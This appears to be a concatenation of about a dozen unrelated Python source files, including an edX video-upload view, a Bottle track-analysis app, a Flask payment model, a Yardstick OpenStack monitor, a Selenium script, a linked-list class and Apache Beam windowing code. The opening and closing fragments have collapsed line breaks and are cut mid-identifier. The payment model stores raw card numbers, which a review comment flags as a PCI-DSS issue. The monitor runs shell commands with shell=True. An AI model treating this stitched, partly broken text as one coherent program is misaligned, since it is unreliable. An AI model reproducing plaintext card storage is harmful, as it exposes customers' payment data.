""" error = None if "files" not in request.json: error = "Request object is not JSON or does not contain 'files'" elif any( "file_name" not in file or "content_type" not in file for file in request.json["files"] ): error = "Request 'files' entry does not contain 'file_name' and 'content_type'" if error: return JsonResponse({"error": error}, status=400) bucket = storage_service_bucket() course_video_upload_token = course.video_upload_pipeline["course_video_upload_token"] req_files = request.json["files"] resp_files = [] for req_file in req_files: file_name = req_file["file_name"] edx_video_id = unicode(uuid4()) key = storage_service_key(bucket, file_name=edx_video_id) for metadata_name, value in [ ("course_video_upload_token", course_video_upload_token), ("client_video_id", file_name), ("course_key", unicode(course.id)), ]: key.set_metadata(metadata_name, value) upload_url = key.generate_url( KEY_EXPIRATION_IN_SECONDS, "PUT", headers={"Content-Type": req_file["content_type"]} ) # persist edx_video_id as uploaded through this course video_meta_data = AssetMetadata(course.id.make_asset_key(VIDEO_ASSET_TYPE, edx_video_id)) modulestore().save_asset_metadata(video_meta_data, request.user.id) # persist edx_video_id in VAL create_video({ "edx_video_id": edx_video_id, "status": "upload", "client_video_id": file_name, "duration": 0, "encoded_videos": [], }) resp_files.append({"fil
e_name": file_name, "upload_url": upload_url}) return JsonResponse({"files": resp_files}, status=200) def storage_service_bucket(): """ Returns an S3 bucket for video uploads. """ conn = s3.connection.S3Connection( settings.AWS
_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY ) return conn.get_bucket(settings.VIDEO_UPLOAD_PIPELINE["BUCKET"]) def storage_service_key(bucket, file_name): """ Returns an S3 key to the given file in the given bucket. """ key_name = "{}/{}".format( settings.VIDEO_UPLOAD_PIPELINE.get("ROOT_PATH", ""), file_name ) return s3.k
import click

from do_cli.contexts import CTX
from do_cli.commands.common import host_commands


@click.command('list')
@click.option('-f', '--force-refresh', is_flag=True, help='Pull data from the API')
@click.option('-h', '--host-names', help='Comma separated list of host names')
@CTX
def cli(ctx, force_refresh, host_names):
    """
    Show minimal data for droplets

    --host-names -h  Comma separated list of host names
        Show minimal data for specific droplets
    """
    # NOTE: click surfaces the docstring above as this command's --help
    # text, so it is user-facing — do not reword casually.
    if ctx.verbose:
        click.echo("Show minimal data for droplets")
    # host_commands does the actual API/cache lookup and formatting;
    # force_refresh bypasses the cache, host_names filters the result.
    click.echo(host_commands(ctx, force_refresh, host_names))
    if ctx.verbose:
        click.echo('---- cmd_list done ----')
import base64
import csv
import io
import multiprocessing
import numpy as np
import sys
from collections import defaultdict
from io import StringIO
from pathlib import Path

# Import matplotlib ourselves and make it use agg (not any GUI anything)
# before the analyze module pulls it in.
import matplotlib
matplotlib.use('Agg')

from bottle import get, post, redirect, request, response, jinja2_template as template  # noqa: E402

from analysis import heatmaps, process, plot  # noqa: E402
from web.error_handlers import TrackParseError  # noqa: E402
from common import mkdir  # noqa: E402
import config  # noqa: E402


def _make_stats_output(stats, all_keys, do_csv):
    """Render per-track stats either as a CSV attachment or the 'stats' page.

    Mutates each stat dict in place: numpy floats are formatted to 3 decimal
    places and keys missing from a given track are filled with "" so that
    every row has every column.
    """
    for i in range(len(stats)):
        stat = stats[i]
        for k in all_keys:
            if k in stat:
                val = stat[k]
                if isinstance(val, (np.float32, np.float64)):
                    stat[k] = "%0.3f" % val
            else:
                stat[k] = ""
    all_keys.remove('Track file')  # will be added as first column
    all_keys = sorted(list(all_keys))
    all_keys[:0] = ['Track file']  # prepend 'Track file' header
    if do_csv:
        output = StringIO()
        writer = csv.DictWriter(output, fieldnames=all_keys)
        writer.writeheader()
        for stat in stats:
            writer.writerow(stat)
        csvstring = output.getvalue()
        output.close()
        response.content_type = 'text/csv'
        response.headers['Content-Disposition'] = 'attachment; filename=atles_stats.csv'
        return csvstring
    else:
        return template('stats', keys=all_keys, stats=stats)


@get('/stats/')
def get_stats():
    """Collect statistics for the '|'-separated track list in the query string."""
    trackrels = request.query.tracks.split('|')
    exp_type = request.query.exp_type
    stats = []
    all_keys = set()
    for trackrel in trackrels:
        curstats = {}
        curstats['Track file'] = trackrel
        try:
            processor = process.TrackProcessor(str(config.TRACKDIR / trackrel))
            curstats.update(processor.get_setup(['experiment', 'phases', 'general']))
            curstats.update(processor.get_stats_single_table(include_phases=True))
            if exp_type:
                curstats.update(processor.get_exp_stats(exp_type))
        except (ValueError, IndexError):
            # often 'wrong number of columns' due to truncated file from killed experiment
            raise(TrackParseError(trackrel, sys.exc_info()))
        all_keys.update(curstats.keys())
        stats.append(curstats)
    return _make_stats_output(stats, all_keys, do_csv=request.query.csv)


def _do_analyze(trackrel):
    """Produce the full set of plot images for one track file.

    Writes heatmap/trace images under config.PLOTDIR, mirroring the track's
    relative directory. May raise ValueError on malformed track files.
    """
    trackrel = Path(trackrel)
    # ensure directories exist for plot creation
    trackreldir = trackrel.parent
    mkdir(config.PLOTDIR / trackreldir)

    # look for debug frames to create links in the trace plot
    trackname = trackrel.name.replace('-track.csv', '')
    dbgframedir = config.DBGFRAMEDIR / trackreldir / trackname
    # list so TrackPlotter can re-use (instead of exhausting the iterable)
    dbgframes = list(dbgframedir.glob("subframe*.png"))

    processor = process.TrackProcessor(str(config.TRACKDIR / trackrel))
    plotter = plot.TrackPlotter(processor, dbgframes)
    plotter.plot_heatmap()

    def saveplot(filename):
        # helper: save the current matplotlib figure under PLOTDIR
        plot.savefig(str(config.PLOTDIR / filename))

    saveplot("{}.10.heat.png".format(trackrel))
    plotter.plot_invalidheatmap()
    saveplot("{}.12.heat.invalid.png".format(trackrel))
    if processor.num_phases() > 1:
        # per-phase breakdown only makes sense with multiple phases
        plotter.plot_heatmap(plot_type='per-phase')
        saveplot("{}.14.heat.perphase.png".format(trackrel))
    plotter.plot_heatmap(plot_type='per-minute')
    saveplot("{}.15.heat.perminute.png".format(trackrel))
    plotter.plot_trace()
    saveplot("{}.20.plot.svg".format(trackrel))


@post('/analyze/')
def post_analyze():
    """Analyze a single track, then redirect to its view page."""
    trackrel = request.query.trackrel
    try:
        _do_analyze(trackrel)
    except ValueError:
        # often 'wrong number of columns' due to truncated file from killed experiment
        raise(TrackParseError(trackrel, sys.exc_info()))
    redirect("/view/{}".format(trackrel))


def _analyze_selection(trackrels):
    """Best-effort analysis of many tracks; runs in a background process."""
    for trackrel in trackrels:
        try:
            _do_analyze(trackrel)
        except ValueError:
            # often 'wrong number of columns' due to truncated file from killed experiment
            pass  # nothing to be done here; we're processing in the background


@post('/analyze_selection/')
def post_analyze_selection():
    """Kick off background analysis of a '|'-separated track selection."""
    trackrels = request.query.trackrels.split('|')
    p = multiprocessing.Process(target=_analyze_selection, args=(trackrels,))
    p.start()


@get('/heatmaps/')
def get_heatmaps():
    """Render combined per-phase heatmaps for tracks sharing one phase setup."""
    trackrels = request.query.tracks.split('|')
    processors = []
    # to verify all phases are equivalent
    plength_map = defaultdict(list)
    for trackrel in trackrels:
        try:
            p = process.TrackProcessor(str(config.TRACKDIR / trackrel), just_raw_data=True)
            processors.append(p)
            plength_map[tuple(phase.length for phase in p.phase_list)].append(trackrel)
        except ValueError:
            raise(TrackParseError(trackrel, sys.exc_info()))

    if len(plength_map) > 1:
        lengths_string = '\n'.join(
            "{} in:\n    {}\n".format(
                str(lengths),
                "\n    ".join(trackrel for trackrel in plength_map[lengths])
            )
            for lengths in plength_map
        )
        return template('error', errormsg="The provided tracks do not all have the same phase lengths.  Please select tracks that share an experimental setup.<br>Phase lengths found:<pre>{}</pre>".format(lengths_string))

    # Save all images as binary to be included in the page directly
    # Base64-encoded.  (Saves having to write temporary data to filesystem.)
    images_data = []

    # use phases from an arbitrary track
    plengths = plength_map.popitem()[0]
    dataframes = [proc.df for proc in processors]
    phase_start = 0
    for i, length in enumerate(plengths):
        phase_end = phase_start + length
        # slice all tracks to this phase's time window (minutes -> seconds)
        x, y = heatmaps.get_timeslice(dataframes, phase_start*60, phase_end*60)
        title = "Phase {} ({}:00-{}:00)".format(i+1, phase_start, phase_end)
        ax = heatmaps.make_heatmap(x, y, title)
        plot.format_axis(ax)
        image_data = io.BytesIO()
        plot.savefig(image_data, format='png')
        images_data.append(
            base64.b64encode(image_data.getvalue()).decode()
        )
        phase_start = phase_end

    return template('view', imgdatas=images_data)
# project/models.py

from project import db
from project.uuid_gen import id_column


class Payment(db.Model):
    """One payment record submitted by a customer.

    NOTE(review): cardNumber appears to be stored in plaintext — storing
    raw card numbers is a PCI-DSS violation; confirm whether this field is
    tokenized/encrypted upstream before it reaches this model.
    """

    # UUID primary key generated by project.uuid_gen.
    id = id_column()
    email = db.Column(db.String(255), unique=False, nullable=False)
    names = db.Column(db.String(255), unique=False, nullable=False)
    # camelCase column name kept as-is: renaming would change the DB schema.
    cardNumber = db.Column(db.String(255), unique=False, nullable=False)
    phone = db.Column(db.String(255), unique=False, nullable=False)
    amount = db.Column(db.Float, unique=False, nullable=False)
    # What the payment was for (free-form description).
    object_payment = db.Column(db.String(255), unique=False, nullable=False)
    # False until the payment is confirmed/processed.
    status = db.Column(db.Boolean, nullable=False, default=False)

    def __init__(self, email, names, card_number, phone, amount, object_payment, status=False):
        self.names = names
        self.email = email
        self.cardNumber = card_number
        self.phone = phone
        self.amount = amount
        self.object_payment = object_payment
        self.status = status
##############################################################################
# Copyright (c) 2015 Huawei Technologies Co.,Ltd. and others
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
import logging
import subprocess
import traceback

import yardstick.ssh as ssh

import basemonitor as basemonitor

LOG = logging.getLogger(__name__)


def _execute_shell_command(command):
    '''execute shell script with error handling

    Returns (exitcode, output); exitcode is 0 on success, -1 on any
    failure, in which case output holds the formatted traceback.
    '''
    exitcode = 0
    output = []
    try:
        output = subprocess.check_output(command, shell=True)
    except Exception:
        exitcode = -1
        output = traceback.format_exc()
        LOG.error("exec command '%s' error:\n " % command)
        LOG.error(traceback.format_exc())

    return exitcode, output


class MonitorOpenstackCmd(basemonitor.BaseMonitor):
    """Monitor that repeatedly runs an OpenStack CLI command and reports
    whether it succeeds, either locally or over SSH on a target node."""
    __monitor_type__ = "openstack-cmd"

    def setup(self):
        # If a host is configured, open an SSH connection to it; otherwise
        # self.connection stays None and commands run locally.
        self.connection = None
        node_name = self._config.get("host", None)
        if node_name:
            host = self._context[node_name]
            ip = host.get("ip", None)
            user = host.get("user", "root")
            key_filename = host.get("key_filename", "~/.ssh/id_rsa")

            self.connection = ssh.SSH(user, ip, key_filename=key_filename)
            # Block (up to 10 minutes) until the host is reachable.
            self.connection.wait(timeout=600)
            LOG.debug("ssh host success!")

        self.check_script = self.get_script_fullpath(
            "ha_tools/check_openstack_cmd.bash")

        self.cmd = self._config["command_name"]

    def monitor_func(self):
        """Run the configured command once; True means it succeeded."""
        exit_status = 0
        if self.connection:
            # Remote: stream the check script over stdin to bash on the node.
            exit_status, stdout, stderr = self.connection.execute(
                "/bin/bash -s '{0}'".format(self.cmd),
                stdin=open(self.check_script, "r"))

            LOG.debug("the ret stats: %s stdout: %s stderr: %s"
                      % (exit_status, stdout, stderr))
        else:
            exit_status, stdout = _execute_shell_command(self.cmd)
        if exit_status:
            return False
        return True

    def verify_SLA(self):
        """Check the measured outage time against the configured SLA.

        NOTE(review): outage_time defaults to None if absent; the
        comparison below assumes it is always populated by the framework
        before this is called — confirm in basemonitor.
        """
        outage_time = self._result.get('outage_time', None)
        LOG.debug("the _result:%s" % self._result)
        max_outage_time = self._config["sla"]["max_outage_time"]
        if outage_time > max_outage_time:
            LOG.info("SLA failure: %f > %f" % (outage_time, max_outage_time))
            return False
        else:
            LOG.info("the sla is passed")
            return True


def _test():    # pragma: no cover
    # Manual smoke test: monitor `nova image-list` on a hard-coded node.
    host = {
        "ip": "192.168.235.22",
        "user": "root",
        "key_filename": "/root/.ssh/id_rsa"
    }
    context = {"node1": host}
    monitor_configs = []
    config = {
        'monitor_type': 'openstack-cmd',
        'command_name': 'nova image-list',
        'monitor_time': 1,
        'host': 'node1',
        'sla': {'max_outage_time': 5}
    }
    monitor_configs.append(config)

    p = basemonitor.MonitorMgr()
    p.init_monitors(monitor_configs, context)
    p.start_monitors()
    p.wait_monitors()
    p.verify_SLA()


if __name__ == '__main__':    # pragma: no cover
    _test()
#coding=utf-8
# Manual UI walk-through ("test36"): log in to the LexianManager admin
# console and navigate to a sub-page of the 8th left-menu section, then
# focus the "manager" iframe. Relies on a live server at 192.168.17.66.
from selenium import webdriver
import pymysql
import unittest,time
from selenium.webdriver.common.keys import Keys

print("test36")
wf = webdriver.Firefox()
# NOTE(review): mark_01 and n are never used below — presumably leftovers
# from a template shared by sibling test scripts.
mark_01=0
n=0
wf.get("http://192.168.17.66:8080/LexianManager/html/login.html")
# Login form appears pre-filled; just submit it.
wf.find_element_by_xpath(".//*[@id='login']").click()
time.sleep(1)
# Open menu section 8, then its second sub-entry.
wf.find_element_by_xpath(".//*[@id='leftMenus']/div[8]/div[1]/div[2]/a[2]").click()
time.sleep(1)
wf.find_element_by_xpath(".//*[@id='leftMenus']/div[8]/div[2]/ul/li[2]/a").click()
time.sleep(1)
# NOTE(review): switch_to_frame is deprecated in newer selenium releases
# (switch_to.frame) — fine only while pinned to an old selenium version.
wf.switch_to_frame("manager")
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Formatter for Android contacts2.db database events."""

from plaso.lib import eventdata


class AndroidCallFormatter(eventdata.ConditionalEventFormatter):
  """Formatter for Android call history events.

  Declarative formatter: the base ConditionalEventFormatter assembles the
  message from whichever of these attribute pieces are present on the event.
  """

  # Matches events produced by the Android call-history parser.
  DATA_TYPE = 'android:event:call'

  FORMAT_STRING_PIECES = [
      u'{call_type}',
      u'Number: {number}',
      u'Name: {name}',
      u'Duration: {duration} seconds']

  # Abbreviated one-piece message used in short output mode.
  FORMAT_STRING_SHORT_PIECES = [u'{call_type} Call']

  SOURCE_LONG = 'Android Call History'
  SOURCE_SHORT = 'LOG'
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python demo tool for BertNLClassifier."""

import inspect
import os.path as _os_path
import subprocess
import sys

from absl import app
from absl import flags

FLAGS = flags.FLAGS

flags.DEFINE_string('model_path', None, 'Model Path')
flags.DEFINE_string('text', None, 'Text to Predict')

# Required flag.
flags.mark_flag_as_required('model_path')
flags.mark_flag_as_required('text')

# Path of the native demo binary, resolved relative to this source file.
_BERT_NL_CLASSIFIER_NATIVE_PATH = _os_path.join(
    _os_path.dirname(inspect.getfile(inspect.currentframe())),
    '../bert_nl_classifier_demo')


def classify(model_path, text):
  """Classifies input text into different categories.

  Args:
    model_path: path to model
    text: input text
  """
  # Run the native classifier binary. Arguments are passed as an argv list
  # with shell=False (the default) so that quotes, spaces, and shell
  # metacharacters in `text` cannot be interpreted by a shell — the original
  # string-concatenated shell=True invocation was a command-injection and
  # quoting hazard.
  subprocess.run(
      [
          _BERT_NL_CLASSIFIER_NATIVE_PATH,
          '--model_path=' + model_path,
          '--text=' + text,
      ],
      check=True)


def run_main(argv):
  """absl entry point: classify the text supplied via flags."""
  del argv  # Unused.
  classify(FLAGS.model_path, FLAGS.text)


# Simple wrapper to make the code pip-friendly
def main():
  app.run(main=run_main, argv=sys.argv)


if __name__ == '__main__':
  main()
# [1] https://doi.org/10.1016/0009-2614(91)90115-P
#     Helgaker, 1991

import numpy as np
from scipy.optimize import newton

from pysisyphus.tsoptimizers.TSHessianOptimizer import TSHessianOptimizer


class TRIM(TSHessianOptimizer):
    """Trust-Region Image Minimization TS optimizer (Helgaker 1991, [1])."""

    def optimize(self):
        """Compute one TS-search step.

        Builds the "image function" by flipping the sign of the followed
        mode's eigenvalue and gradient component, then finds a levelshift
        mu (via Newton's method) so the step fits the trust radius.
        Returns the step in the original coordinate basis.
        """
        energy, gradient, H, eigvals, eigvecs, resetted = self.housekeeping()

        self.update_ts_mode(eigvals, eigvecs)

        self.log(f"Signs of eigenvalue and -vector of root {self.root} "
                 "will be reversed!")
        # Transform gradient to basis of eigenvectors
        gradient_ = eigvecs.T.dot(gradient)

        # Construct image function by inverting the signs of the eigenvalue and
        # -vector of the mode to follow uphill.
        eigvals_ = eigvals.copy()
        eigvals_[self.root] *= -1
        gradient_ = gradient_.copy()
        gradient_[self.root] *= -1

        def get_step(mu):
            # Levelshifted Newton step in the eigenvector basis.
            zetas = -gradient_ / (eigvals_ - mu)
            # Replace nan with 0. (guards against division by ~zero
            # eigenvalue - mu)
            zetas = np.nan_to_num(zetas)
            # Transform to original basis
            step = eigvecs * zetas
            step = step.sum(axis=1)
            return step

        def get_step_norm(mu):
            return np.linalg.norm(get_step(mu))

        def func(mu):
            # Root of this function: step norm exactly at the trust radius.
            return get_step_norm(mu) - self.trust_radius

        mu = 0
        norm0 = get_step_norm(mu)
        # Only search for a levelshift when the unshifted step is too long.
        if norm0 > self.trust_radius:
            mu, res = newton(func, x0=mu, full_output=True)
            assert res.converged
            self.log(f"Using levelshift of μ={mu:.4f}")
        else:
            self.log("Took pure newton step without levelshift")

        step = get_step(mu)
        step_norm = np.linalg.norm(step)
        self.log(f"norm(step)={step_norm:.6f}")
        # NOTE(review): the model uses self.H while the local H returned by
        # housekeeping() is unused — confirm they are the same object here.
        self.predicted_energy_changes.append(self.quadratic_model(gradient, self.H, step))

        return step
class Node:
    """A singly linked list node holding a value and a next pointer."""

    def __init__(self, val):
        self.value = val
        self.nextNode = None

    def getValue(self):
        return self.value

    def getNextNode(self):
        return self.nextNode

    def setValue(self, val):
        self.value = val

    def setNextNode(self, nxtNode):
        self.nextNode = nxtNode


"""
Linked List (LL)

Following are the basic operations supported by a list :-
1. Add − Adds an element at the beginning of the list.
2. Deletion − Deletes an element at the beginning of the list.
3. Display − Displays the complete list.
4. Search − Searches an element using the given key.
"""


class LinkedList:
    """Singly linked list with O(1) insertion at the head."""

    def __init__(self):
        self.head = None

    def isEmpty(self):
        """Return True when the list holds no nodes."""
        return self.head is None

    def add(self, value):
        """Prepend a new node holding `value` at the head of the list."""
        temp = Node(value)
        temp.setNextNode(self.head)
        self.head = temp

    def size(self):
        """Return the total number of nodes in the list."""
        count = 0
        temp = self.head
        while temp is not None:
            count += 1
            temp = temp.getNextNode()
        return count

    def printList(self):
        """Print the value of every node, head first, one per line."""
        temp = self.head
        while temp is not None:
            print(temp.getValue())
            temp = temp.getNextNode()

    def deleteNode(self, key):
        """Remove every node whose value equals `key`.

        BUG FIX: the original assigned ``temp = temp.setNextNode(...)``;
        since the setter returns None, the traversal silently stopped
        after the first deletion, and a matching head node could never
        be removed at all.
        """
        # First unlink any matching nodes sitting at the head.
        while self.head is not None and self.head.getValue() == key:
            self.head = self.head.getNextNode()
        # Then unlink matches in the remainder of the list.
        temp = self.head
        while temp is not None:
            nextNode = temp.getNextNode()
            if nextNode is not None and nextNode.getValue() == key:
                # Bypass the matching node; stay put in case the new
                # successor also matches.
                temp.setNextNode(nextNode.getNextNode())
            else:
                temp = temp.getNextNode()


if __name__ == "__main__":
    # Create a new linked list
    myList = LinkedList()

    # Add elements to the list
    for value in (1, 2, 3, 4, 5, 6, 3, 7):
        myList.add(value)

    # Perform operations on the list
    print("List Size : " + str(myList.size()))
    myList.printList()
    print("---------------------")
    myList.deleteNode(3)
    print("List Size : " + str(myList.size()))
    myList.printList()
from flask.ext.flails import FlailsView
from flask import render_template, redirect, url_for, request
#from config import db
import models
import forms


class PrivatePostView(FlailsView):
    """CRUD views for Post objects and their comments.

    NOTE(review): the `db` import is commented out above, so every
    database write in this class is disabled as well; the handlers
    currently only render templates and redirect.
    """

    def private_post_index(self):
        # List all posts.
        object_list = models.Post.query.all()
        return render_template('post/index.slim', object_list=object_list)

    def private_post_show(self, ident):
        # Show a single post together with an empty comment form.
        post = models.Post.query.get(ident)
        form = forms.CommentForm()
        return render_template('post/show.slim', post=post, form=form)

    def private_post_new(self):
        # Create a new post from the submitted form.
        form = forms.PostForm()
        if form.validate_on_submit():
            post = models.Post(form.name.data, form.title.data,
                               form.content.data)
            #db.session.add(post)
            #db.session.commit()
            return redirect(url_for('post.index'))
        return render_template('post/new.slim', form=form)

    def private_post_edit(self, ident):
        # Update an existing post from the submitted form.
        post = models.Post.query.get(ident)
        form = forms.PostForm(request.form, post)
        if form.validate_on_submit():
            post.name = form.name.data
            post.title = form.title.data
            post.content = form.content.data
            #db.session.add(post)
            #db.session.commit()
            return redirect(url_for('post.show', ident=ident))
        return render_template('post/edit.slim', form=form, post=post)

    def private_post_delete(self, ident):
        post = models.Post.query.get(ident)
        # BUG FIX: these calls referenced `db`, whose import is commented
        # out at the top of the file, so this handler raised NameError at
        # runtime.  Disabled to match every other handler until the db
        # import is restored.
        #db.session.delete(post)
        #db.session.commit()
        return redirect(url_for('post.index'))

    def private_comment_new(self, post_id):
        # Attach a new comment to the given post.
        post = models.Post.query.get(post_id)
        form = forms.CommentForm()
        if form.validate_on_submit():
            comment = models.Comment(form.commenter.data, form.body.data,
                                     post_id)
            #db.session.add(comment)
            #db.session.commit()
            return redirect(url_for('.show', ident=post_id))
        return render_template('post/show.slim', post=post, form=form)

    def private_comment_delete(self, post_id, ident):
        comment = models.Comment.query.get(ident)
        #db.session.delete(comment)
        #db.session.commit()
        return redirect(url_for('.show', ident=post_id))
from flask import Response
from flask.views import View
from bson import json_util

from mcp import mongo


class Map(View):
    """Per-company-seat procurement totals for one municipality and year,
    plus min/max bounds across seats (used for map scaling)."""

    def dispatch_request(self, komuna, viti):
        # Filter stage shared by both pipelines: the requested municipality
        # and year, excluding companies without a seat slug.
        match_stage = {
            "$match": {
                "komuna.slug": komuna,
                "viti": viti,
                "kompania.selia.slug": {'$ne': ''}
            }
        }

        # Totals grouped by company seat, sorted by seat slug.
        json = mongo.db.procurements.aggregate([
            match_stage,
            {
                "$group": {
                    "_id": {
                        "selia": "$kompania.selia.slug",
                        "emri": "$kompania.selia.emri",
                        "gjeresi": "$kompania.selia.kordinatat.gjeresi",
                        "gjatesi": "$kompania.selia.kordinatat.gjatesi",
                    },
                    "cmimi": {"$sum": "$kontrata.qmimi"},
                    "vlera": {"$sum": "$kontrata.vlera"},
                    "numriKontratave": {"$sum": 1}
                }
            },
            {"$sort": {"_id.selia": 1}},
            {
                "$project": {
                    "selia": "$_id.selia",
                    "emri": "$_id.emri",
                    "gjeresia": "$_id.gjeresi",
                    "gjatesia": "$_id.gjatesi",
                    "cmimi": "$cmimi",
                    "vlera": "$vlera",
                    "numriKontratave": "$numriKontratave",
                    "_id": 0
                }
            }
        ])

        # Second pass: per-seat sums reduced to global min/max bounds.
        json_min_max = mongo.db.procurements.aggregate([
            match_stage,
            {
                "$group": {
                    "_id": {
                        "selia": "$kompania.selia.slug",
                        "gjeresi": "$kompania.selia.kordinatat.gjeresi",
                        "gjatesi": "$kompania.selia.kordinatat.gjatesi",
                    },
                    "sumCmimi": {"$sum": "$kontrata.qmimi"},
                    "sumVlera": {"$sum": "$kontrata.vlera"},
                    "sumNumriKontratave": {"$sum": 1}
                }
            },
            {
                "$group": {
                    "_id": {},
                    "maxCmimi": {"$max": "$sumCmimi"},
                    "maxVlera": {"$max": "$sumVlera"},
                    "maxNumriKontratave": {"$max": "$sumNumriKontratave"},
                    "minCmimi": {"$min": "$sumCmimi"},
                    "minVlera": {"$min": "$sumVlera"},
                    "minNumriKontratave": {"$min": "$sumNumriKontratave"},
                }
            },
            {
                "$project": {
                    "_id": 0,
                    "vlera": {
                        "min": "$minVlera",
                        "max": "$maxVlera",
                    },
                    "cmimi": {
                        "min": "$minCmimi",
                        "max": "$maxCmimi",
                    },
                    "numriKontratave": {
                        "min": "$minNumriKontratave",
                        "max": "$maxNumriKontratave",
                    }
                }
            }
        ])

        # Reply serialised via json_util.dumps(), which knows BSON types.
        # NOTE(review): indexing with ['result'] assumes the old pymongo
        # dict-style aggregate reply -- confirm against the driver version.
        result_json = {
            'bounds': json_min_max['result'][0],
            'result': json['result'],
        }

        return Response(
            response=json_util.dumps(result_json),
            mimetype='application/json')
for the built-in windowing primitives here. Integer or floating point seconds can be passed to these primitives. Internally, seconds, with microsecond granularity, are stored as timeutil.Timestamp and timeutil.Duration objects. This is done to avoid precision errors that would occur with floating point representations. Custom windowing function classes can be created, by subclassing from WindowFn. """ from __future__ import absolute_import import abc from builtins import object from builtins import range from functools import total_ordering from future.utils import with_metaclass from google.protobuf import duration_pb2 from google.protobuf import timestamp_pb2 from apache_beam.coders import coders from apache_beam.portability import common_urns from apache_beam.portability import python_urns from apache_beam.portability.api import beam_runner_api_pb2 from apache_beam.portability.api import standard_window_fns_pb2 from apache_beam.transforms import timeutil from apache_beam.utils import proto_utils from apache_beam.utils import urns from apache_beam.utils import windowed_value from apache_beam.utils.timestamp import MIN_TIMESTAMP from apache_beam.utils.timestamp import Duration from apache_beam.utils.timestamp import Timestamp from apache_beam.utils.windowed_value import WindowedValue __all__ = [ 'TimestampCombiner', 'WindowFn', 'BoundedWindow', 'IntervalWindow', 'TimestampedValue', 'GlobalWindow', 'NonMergingWindowFn', 'GlobalWindows', 'FixedWindows', 'SlidingWindows', 'Sessions', ] # TODO(ccy): revisit naming and semantics once Java Apache Beam finalizes their # behavior. class TimestampCombiner(object): """Determines how output timestamps of grouping operations are assigned.""" OUTPUT_AT_EOW = beam_runner_api_pb2.OutputTime.END_OF_WINDOW OUTPUT_AT_EARLIEST = beam_runner_api_pb2.OutputTime.EARLIEST_IN_PANE OUTPUT_AT_LATEST = beam_runner_api_pb2.OutputTime.LATEST_IN_PANE # TODO(robertwb): Add this to the runner API or remove it. 
OUTPUT_AT_EARLIEST_TRANSFORMED = 'OUTPUT_AT_EARLIEST_TRANSFORMED' @staticmethod def get_impl(timestamp_combiner, window_fn): if timestamp_combiner == TimestampCombiner.OUTPUT_AT_EOW: return timeutil.OutputAtEndOfWindowImpl() elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_EARLIEST: return timeutil.OutputAtEarliestInputTimestampImpl() elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_LATEST: return timeutil.OutputAtLatestInputTimestampImpl() elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_EARLIEST_TRANSFORMED: return timeutil.OutputAtEarliestTransformedInputTimestampImpl(window_fn) else: raise ValueError('Invalid TimestampCombiner: %s.' % timestamp_combiner) class WindowFn(with_metaclass(abc.ABCMeta, urns.RunnerApiFn)): """An abstract windowing function defining a basic assign and merge.""" class AssignContext(object): """Context passed to WindowFn.assign().""" def __init__(self, timestamp, element=None, window=None): self.timestamp = Timestamp.of(timestamp) self.element = element self.window = window @abc.abstractmethod def assign(self, assign_context): """Associates windows to an element. Arguments: assign_context: Instance of AssignContext. Returns: An iterable of BoundedWindow. """ raise NotImplementedError class MergeContext(object): """Context passed to WindowFn.merge() to perform merging, if any.""" def __init__(self, windows): self.windows = list(windows) def merge(self, to_be_merged, merge_result): raise NotImplementedError @abc.abstractmethod def merge(self, merge_context): """Returns a window that is the result of merging a set of windows.""" raise NotImplementedError def is_merging(self): """Returns whether this WindowFn merges windows.""" return True @abc.abstractmethod def get_window_coder(self): raise NotImplementedError def get_transformed_output_time(self, window, input_timestamp): # pylint: disable=unused-argument """Given input time and output window, returns output time for window. 
If TimestampCombiner.OUTPUT_AT_EARLIEST_TRANSFORMED is used in the Windowing, the output timestamp for the given window will be the earliest of the timestamps returned by get_transformed_output_time() for elements of the window. Arguments: window: Output window of element. input_timestamp: Input timestamp of element as a timeutil.Timestamp object. Returns: Transformed timestamp. """ # By default, just return the input timestamp. return input_timestamp urns.RunnerApiFn.register_pickle_urn(python_urns.PICKLED_WINDOWFN) class BoundedWindow(object): """A window for timestamps in range (-infinity, end). Attributes: end: End of
window. """ def __init__(self, end): self.end = Timestamp.of(end) def max_timestamp(self): return self.end.predecessor() def __eq__(self, other): raise NotImplementedError def _
_ne__(self, other): # Order first by endpoint, then arbitrarily return self.end != other.end or hash(self) != hash(other) def __lt__(self, other): if self.end != other.end: return self.end < other.end return hash(self) < hash(other) def __le__(self, other): if self.end != other.end: return self.end <= other.end return hash(self) <= hash(other) def __gt__(self, other): if self.end != other.end: return self.end > other.end return hash(self) > hash(other) def __ge__(self, other): if self.end != other.end: return self.end >= other.end return hash(self) >= hash(other) def __hash__(self): raise NotImplementedError def __repr__(self): return '[?, %s)' % float(self.end) @total_ordering class IntervalWindow(windowed_value._IntervalWindowBase, BoundedWindow): """A window for timestamps in range [start, end). Attributes: start: Start of window as seconds since Unix epoch. end: End of window as seconds since Unix epoch. """ def __lt__(self, other): if self.end != other.end: return self.end < other.end return hash(self) < hash(other) def intersects(self, other): return other.start < self.end or self.start < other.end def union(self, other): return IntervalWindow( min(self.start, other.start), max(self.end, other.end)) @total_ordering class TimestampedValue(object): """A timestamped value having a value and a timestamp. Attributes: value: The underlying value. timestamp: Timestamp associated with the value as seconds since Unix epoch. 
